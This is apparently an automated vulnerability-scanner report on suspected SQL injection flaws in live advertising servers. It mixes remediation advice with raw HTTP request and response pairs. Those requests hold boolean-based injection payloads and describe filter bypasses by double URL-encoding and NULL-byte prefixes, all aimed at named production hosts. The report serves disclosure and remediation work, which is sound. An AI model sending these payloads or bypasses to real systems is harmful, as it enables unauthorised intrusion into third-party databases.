SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The TargetID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d1--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5679
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf"; var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d2--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf"; var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif"; var minV = 10; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6381
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 699
The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00'&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6398 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:48:59 GMT Expires: Sun, 30 Jan 2011 14:48:59 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00''&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 711 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:48:59 GMT Expires: Sun, 30 Jan 2011 14:48:59 GMT
The &PID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6634
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Sep 23 16:06:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Screener_300x250.swf"; var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"; ctp[1] = "clickTag1"; ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";
var fv='"m ...[SNIP]...
Request 2
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6466
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Sep 23 15:41:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf"; var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(var ctIndex = ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d852149/4%00'/864449/decide.php?&noiframe=1 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0
Response 1
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 17:27:37 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d852149/4%00''/864449/decide.php?&noiframe=1 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0
Response 2
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 17:30:48 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 301
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d852149/4 was not found on this server.</p> <hr ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11180680'%20or%201%3d1--%20 and 11180680'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 241 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 02:05:46 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html11180680' or 1=1-- was not ...[SNIP]... </p> </body></html>
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 332 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 02:05:46 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html11180680' or 1=2-- was not ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77927196'%20or%201%3d1--%20 and 77927196'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 333 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 02:05:47 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html77927196' or 1=1-- / was not ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 242 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 02:05:47 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html77927196' or 1=2-- / was not ...[SNIP]... </p> </body></html>
The id cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the id cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:42:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
